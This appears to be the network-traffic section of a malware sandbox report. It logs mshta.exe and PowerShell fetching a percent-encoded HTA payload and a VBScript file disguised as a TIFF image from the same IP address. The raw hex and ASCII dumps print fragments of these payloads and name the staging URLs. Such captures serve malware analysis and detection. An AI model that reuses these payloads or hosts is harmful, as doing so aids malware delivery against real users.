                                                                                            Oct 25, 2024 19:50:46.493204117 CEST1236INData Raw: 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32
                                                                                            Data Ascii: 25252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.2249166192.3.176.141803848C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:50:48.404042959 CEST451OUTGET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Range: bytes=8896-
                                                                                            Connection: Keep-Alive
                                                                                            Host: 192.3.176.141
                                                                                            If-Range: "33147-625456f86fad3"
                                                                                            Oct 25, 2024 19:50:49.146286011 CEST1236INHTTP/1.1 206 Partial Content
                                                                                            Date: Fri, 25 Oct 2024 17:50:48 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                            Last-Modified: Fri, 25 Oct 2024 04:20:14 GMT
                                                                                            ETag: "33147-625456f86fad3"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 200327
                                                                                            Content-Range: bytes 8896-209222/209223
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/hta
                                                                                            Data Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 [TRUNCATED]
                                                                                            Data Ascii: 52520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252525252
                                                                                            Oct 25, 2024 19:50:49.146310091 CEST212INData Raw: 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32
                                                                                            Data Ascii: 0%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2
                                                                                            Oct 25, 2024 19:50:49.146334887 CEST1236INData Raw: 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                            Data Ascii: 525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25
                                                                                            Oct 25, 2024 19:50:49.146351099 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 73 41 74 62 4e 66 78 76 57 51 52
                                                                                            Data Ascii: 52520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520sAtbNfxvWQRakqNihpAgcGPJmNBsXCzKtfJVPbDCmTPNhSdzvOpiLmWtYgJfcosZUwbUNxuLJOyCngwUKwOtedJvSoLxDWIjXuKhiONDovjAdBHbcjlWJASzWhWDdWlWEUZPCwvOeKkQgyyDyWVaZYknlEDFdJNUQTidxPiZgCPF
                                                                                            Oct 25, 2024 19:50:49.146364927 CEST1236INData Raw: 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                            Data Ascii: 2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2
                                                                                            Oct 25, 2024 19:50:49.146378994 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32
                                                                                            Data Ascii: 252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25252
                                                                                            Oct 25, 2024 19:50:49.146394968 CEST908INData Raw: 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 33 41 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35
                                                                                            Data Ascii: 20%2525252520%2525252520%252525253A%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%252525252
                                                                                            Oct 25, 2024 19:50:50.138230085 CEST1236INData Raw: 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35
                                                                                            Data Ascii: 5252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525
                                                                                            Oct 25, 2024 19:50:50.138545036 CEST224INData Raw: 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32
                                                                                            Data Ascii: 520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%
                                                                                            Oct 25, 2024 19:50:52.315826893 CEST1236INData Raw: 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                            Data Ascii: 2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2
                                                                                            Oct 25, 2024 19:50:52.315850973 CEST1236INData Raw: 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35 32 35 32 30 25 32 35 32 35 32 35
                                                                                            Data Ascii: 525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%2525252520%25


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.2249170192.3.176.141803944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:08.097014904 CEST371OUTGET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 192.3.176.141
                                                                                            Connection: Keep-Alive
                                                                                            Oct 25, 2024 19:51:09.880809069 CEST1236INHTTP/1.1 200 OK
                                                                                            Date: Fri, 25 Oct 2024 17:51:08 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                            Last-Modified: Fri, 25 Oct 2024 04:03:30 GMT
                                                                                            ETag: "22090-6254533b72ace"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 139408
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: image/tiff
                                                                                            Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 69 00 63 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 [TRUNCATED]
                                                                                            Data Ascii: private function CreateSession(wsman, conStr, optDic, estica) dim grafitarFlags dim conOpt dim grafitar dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword grafitarFlags = 0 proxyAccessType =
                                                                                            Oct 25, 2024 19:51:09.881577969 CEST224INData Raw: 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41
                                                                                            Data Ascii: 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0
                                                                                            Oct 25, 2024 19:51:10.252120018 CEST1236INData Raw: 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 3d
                                                                                            Data Ascii: proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA_ENCODI
                                                                                            Oct 25, 2024 19:51:10.252147913 CEST1236INData Raw: 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 54
                                                                                            Data Ascii: alid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if if op
                                                                                            Oct 25, 2024 19:51:10.252159119 CEST448INData Raw: 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 27 00 2d 00 72 00 65 00 6d 00 6f 00 74 00 65 00 27 00 20
                                                                                            Data Ascii: only valid when used with the '-remote' option" grafitarFlags = grafitarFlags OR wsman.SessionFlagUseSsl e
                                                                                            Oct 25, 2024 19:51:10.388633966 CEST1236INData Raw: 00 6c 00 20 00 3d 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                            Data Ascii: l = optDic.Argument(NPARA_AUTH) select case LCase(authVal) case VAL_NO_AUTH grafit
                                                                                            Oct 25, 2024 19:51:10.388756990 CEST1236INData Raw: 00 65 00 20 00 56 00 41 00 4c 00 5f 00 42 00 41 00 53 00 49 00 43 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 55 00 73 00 65 00 20 00 2d 00 75 00 73 00 65 00 72 00 6e 00 61
                                                                                            Data Ascii: e VAL_BASIC 'Use -username and -password. ASSERTBOOL optDic.ArgumentExists(NPARA_USER
                                                                                            Oct 25, 2024 19:51:10.388770103 CEST1236INData Raw: 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 6d 00 75 00 73 00 74 00 20 00 62 00 65 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 66 00 6f 00 72 00 20 00 27
                                                                                            Data Ascii: RNAME & "' option must be specified for '-auth:digest'" ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT)
                                                                                            Oct 25, 2024 19:51:10.388782024 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 63 00 61 00 73 00 65 00 20 00 56 00 41 00 4c 00 5f 00 4e 00 45 00 47 00 4f 00 54 00 49 00 41 00 54 00 45 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                            Data Ascii: case VAL_NEGOTIATE '-username and -password are optional. ASSERTBOOL not optDi
                                                                                            Oct 25, 2024 19:51:10.388792992 CEST1236INData Raw: 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52
                                                                                            Data Ascii: ntExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option is not valid for '-auth:certificate'" AS
                                                                                            Oct 25, 2024 19:51:10.388807058 CEST1120INData Raw: 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 6d 00 75 00 73 00 74 00 20
                                                                                            Data Ascii: he '-" & NPARA_USERNAME & "' option must be specified for '-auth:credssp'" ASSERTBOOL not optDic.Argumen


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.2249171192.3.176.141803164C:\Windows\System32\mshta.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:08.332019091 CEST486OUTGET /41/ce/greatthingswithgoodnewsgivenbygodthingsgreat.hta HTTP/1.1
                                                                                            Accept: */*
                                                                                            Accept-Language: fr-FR
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            If-Modified-Since: Fri, 25 Oct 2024 04:20:14 GMT
                                                                                            Connection: Keep-Alive
                                                                                            Host: 192.3.176.141
                                                                                            If-None-Match: "33147-625456f86fad3"
                                                                                            Oct 25, 2024 19:51:08.991213083 CEST275INHTTP/1.1 304 Not Modified
                                                                                            Date: Fri, 25 Oct 2024 17:51:08 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                            Last-Modified: Fri, 25 Oct 2024 04:20:14 GMT
                                                                                            ETag: "33147-625456f86fad3"
                                                                                            Accept-Ranges: bytes
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.2249172192.3.176.141801488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Oct 25, 2024 19:51:14.152308941 CEST371OUTGET /41/simplethingswithgreatthignsgivenmebestthings.tIF HTTP/1.1
                                                                                            Accept: */*
                                                                                            UA-CPU: AMD64
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                            Host: 192.3.176.141
                                                                                            Connection: Keep-Alive
                                                                                            Oct 25, 2024 19:51:14.806427002 CEST1236INHTTP/1.1 200 OK
                                                                                            Date: Fri, 25 Oct 2024 17:51:13 GMT
                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                            Last-Modified: Fri, 25 Oct 2024 04:03:30 GMT
                                                                                            ETag: "22090-6254533b72ace"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Length: 139408
                                                                                            Keep-Alive: timeout=5, max=100
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: image/tiff
                                                                                            Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 65 00 73 00 74 00 69 00 63 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 67 00 72 00 61 00 66 00 69 00 74 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 [TRUNCATED]
                                                                                            Data Ascii: private function CreateSession(wsman, conStr, optDic, estica) dim grafitarFlags dim conOpt dim grafitar dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword grafitarFlags = 0 proxyAccessType =
                                                                                            Oct 25, 2024 19:51:14.806452990 CEST224INData Raw: 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41
                                                                                            Data Ascii: 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal = 0
                                                                                            Oct 25, 2024 19:51:14.806493044 CEST1236INData Raw: 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 3d 00 20 00 22 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 3d
                                                                                            Data Ascii: proxyUsername = "" proxyPassword = "" set conOpt = Nothing if optDic.ArgumentExists(NPARA_ENCODI
                                                                                            Oct 25, 2024 19:51:14.806514978 CEST1236INData Raw: 00 61 00 6c 00 69 00 64 00 21 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 20 00 22 00 54
                                                                                            Data Ascii: alid! ASSERTBOOL false, "The specified encoding flag is invalid." end if end if if op
                                                                                            Oct 25, 2024 19:51:14.806539059 CEST1236INData Raw: 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 77 00 68 00 65 00 6e 00 20 00 75 00 73 00 65 00 64 00 20 00 77 00 69 00 74 00 68 00 20 00 74 00 68 00 65 00 20 00 27 00 2d 00 72 00 65 00 6d 00 6f 00 74 00 65 00 27 00 20
                                                                                            Data Ascii: only valid when used with the '-remote' option" grafitarFlags = grafitarFlags OR wsman.SessionFlagUseSsl e
                                                                                            Oct 25, 2024 19:51:14.806608915 CEST1236INData Raw: 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f
                                                                                            Data Ascii: he '-" & NPARA_USERNAME & "' option is not valid for '-auth:none'" ASSERTBOOL not optDic.ArgumentExists(
                                                                                            Oct 25, 2024 19:51:14.806629896 CEST1236INData Raw: 00 73 00 73 00 69 00 6f 00 6e 00 46 00 6c 00 61 00 67 00 43 00 72 00 65 00 64 00 55 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 50 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 20 00 4f 00 52 00 20 00 77 00 73 00 6d 00 61 00 6e 00 2e 00 53 00 65
                                                                                            Data Ascii: ssionFlagCredUsernamePassword OR wsman.SessionFlagUseBasic case VAL_DIGEST 'Use -username a
                                                                                            Oct 25, 2024 19:51:14.806655884 CEST1236INData Raw: 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63
                                                                                            Data Ascii: ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for
                                                                                            Oct 25, 2024 19:51:14.806679964 CEST1236INData Raw: 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54
                                                                                            Data Ascii: SERTBOOL optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option must be specified for '-auth:certificate'"
                                                                                            Oct 25, 2024 19:51:14.806703091 CEST1236INData Raw: 00 6e 00 61 00 6d 00 65 00 20 00 61 00 6e 00 64 00 20 00 2d 00 70 00 61 00 73 00 73 00 77 00 6f 00 72 00 64 00 2e 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53
                                                                                            Data Ascii: name and -password. ASSERTBOOL osVersion >= osVista, "The specified '-" & NPARA_AUTH & "' flag '" & au
                                                                                            Oct 25, 2024 19:51:14.812040091 CEST1236INData Raw: 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 20 00 26 00 20 00 22 00 27 00 20 00 66 00 6c 00 61 00 67 00 20 00 27 00 22 00 20 00 26 00 20
                                                                                            Data Ascii: pecified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value." end select end if if


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
